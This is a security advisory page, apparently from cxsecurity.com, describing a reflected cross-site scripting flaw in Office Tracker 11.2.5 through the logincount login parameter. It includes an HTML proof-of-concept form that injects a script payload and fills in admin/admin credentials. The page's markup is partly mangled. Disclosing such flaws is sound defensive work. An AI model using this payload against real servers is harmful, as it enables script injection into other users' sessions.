Office Tracker 11.2.5 Cross Site Scripting

2018.01.09
Credit: Nassim Asrir
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Title: Office Tracker 11.2.5 - XSS # Author: Nassim Asrir # Contact: wassline@gmail.com # Vendor: https://www.officetracker.com/ # CVE: CVE-2017-18023 # Description Office Tracker 11.2.5 has XSS via the logincount parameter to the /otweb/OTPClientLogin URI. ------------------------------------------ # Details The value of the logincount request parameter is copied into the HTML document as plain text between tags. The payload chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount parameter. This input was echoed unmodified in the application's response. ------------------------------------------ # Vulnerability Type Cross Site Scripting (XSS) ------------------------------------------ # Attack Type Remote ------------------------------------------ # POC <html> <body <scripthistory.pushState('', '', '/')</script <form action="http://server/otweb/OTPClientLogin" method="POST" <input type="hidden" name="logincount" value="0chfkh&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;p9glb" / <input type="hidden" name="lastname" value="MorisonM" / <input type="hidden" name="timezone" value="" / <input type="hidden" name="uid" value="" / <input type="hidden" name="phone" value="false" / <input type="hidden" name="login" value="admin" / <input type="hidden" name="password" value="admin" / <input type="hidden" name="submitbtn" value="Login" / <input type="submit" value="Submit request" / </form </body </html ------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top